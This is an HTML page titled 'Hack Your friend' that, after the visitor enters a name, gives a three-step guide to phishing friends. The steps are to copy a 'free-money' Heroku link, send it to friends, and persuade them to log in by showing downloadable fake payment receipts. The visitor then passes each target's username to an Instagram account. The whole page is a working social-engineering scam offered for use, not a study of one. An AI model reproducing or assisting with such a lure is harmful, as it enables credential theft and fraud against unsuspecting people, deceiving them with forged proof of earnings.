<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hack Your friend</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/1.5.12/clipboard.min.js"></script>
    <style>
        * {
            margin: 0em;
            padding: 0%;
            outline: none;
            box-sizing: border-box;
        }
        
        html {
            background-color: black;
        }
        
        body {
            background: url('/static/back.png') no-repeat center center /cover;
            width: 100vw;
            height: 100vh;
            overflow: hidden;
            opacity: 0.8;
            display: flex;
            display: flex;
            flex-direction: column;
            justify-content: space-evenly;
        }
        
        form,
        section div.result {
            margin: auto 1em;
            display: flex;
            flex-direction: column;
            max-width: 500px;
            justify-content: center;
            border: 2px solid black;
            color: white;
            background-color: rgba(0, 0, 0, .5);
            padding: 1em;
            font-size: 2em;
        }
        
        section div.result {
            padding-top: 4em;
            overflow: scroll;
            height: fit-content;
            max-height: 95VH;
        }
        
        .discription {
            font-size: .55em;
            margin-bottom: 2em;
            text-transform: uppercase;
            text-align: center;
        }
        
        form input[type='text'] {
            padding: 0.1em;
            margin: 0.3em;
            font-size: .5em;
            background-color: rgba(255, 255, 255, 0.91);
        }
        
        form div {
            display: flex;
            justify-content: space-evenly;
        }
        
        form input[type='submit'] {
            width: 70%;
            font-size: 1em;
            margin: 0.9em;
            background-color: #7f8c8d;
            color: white;
            align-self: center;
        }
        
        .heading {
            font-size: 1.45em;
            text-decoration: underline;
        }
        
        .head {
            font-size: 1.2em;
            margin: 0.51em 0;
        }
        
        ol {
            font-size: 0.81em;
        }
        
        .ending {
            font-size: 1em;
            margin-top: 1em;
        }
        
        button {
            margin: 0.5em;
            padding: 0.21em;
            width: 100%;
            font-size: 1.2em;
            background-color: #725f4fdb;
            color: white;
            transition: 0.8s;
        }
        
        a {
            color: white;
            color: white;
            font-weight: 800;
        }
        
        .reciept {
            border: 2px solid white;
            border-radius: 10px;
            background-color: #7f8c8d;
            display: block;
            text-align: center;
            margin: 20px;
            text-decoration: none;
        }
    </style>
</head>

<body>
    <div class="cointainer">
        <form id="form">
            <div class='discription'>
                Enter your name to get the attacking link
            </div>
            <div class="name">
                <label for="name">NAME:</label>
                <input type="text" name="name" id="name">
                <input type="hidden" name="link" id="link" value='https://free-money-net.herokuapp.com/'>
            </div>
            <input type="submit" value="send">

        </form>
        <section id='section'>
        </section>
    </div>
</body>
<script>
    var url = 'https://free-money-net.herokuapp.com/'
    let form = document.getElementById('form')
    let result = document.createElement('div')
    let section = document.getElementById('section')
    result.setAttribute('class', 'result')

    form.addEventListener('submit', (e) => {
        e.preventDefault();
        var name = form.elements[0].value
        let data;
        if (name == '') {
            //return-enpty-text-inx-results
            data = 'Enter Name !'
        } else {
            document.getElementById('form').style.display = 'none';
            data = `<div class='heading'>welcome ${name}</div>
            <div class='head'>
            This is 3 step process:-
            </div>
                <ol>
                    <li>
                        copy the link first 
                        <button class="btn" data-clipboard-text="${url}">
                            Copy link!</button>
                    </li>
                    <li>
                        send it to your friend(s) and emphasize them to login,by telling them that you also earn form this site,by showing fake reciepts.
                        <a class='reciept' onclick="this.style.background='rgb(91, 218, 151)'" download href="/static/1500.jfif">reciept- ₹1500</a>
                        <a class='reciept' onclick="this.style.background='rgb(91, 218, 151)'" download href="/static/1700.jfif">reciept- ₹1700</a>
                    </li>
                    <li>
                        ensure that your target login with his username.
                    </li>
                </ol>
            </div>
            <div class='ending'>
                after this DM me the username of your target on <b>insta</b> at
            </div>
            <a href="https://www.instagram.com/computerbot54/">    
                @computerbot54
            </a>
            `
        }
        result.innerHTML = data
        section.appendChild(result)
        var clip = new Clipboard('.btn');
        clip.on("success", function() {
            let btn = document.querySelector('.btn')
            console.log('copying');
            btn.innerHTML = 'copied!'
            btn.style.background = '#5bda97';

        });
    })
</script>


</html>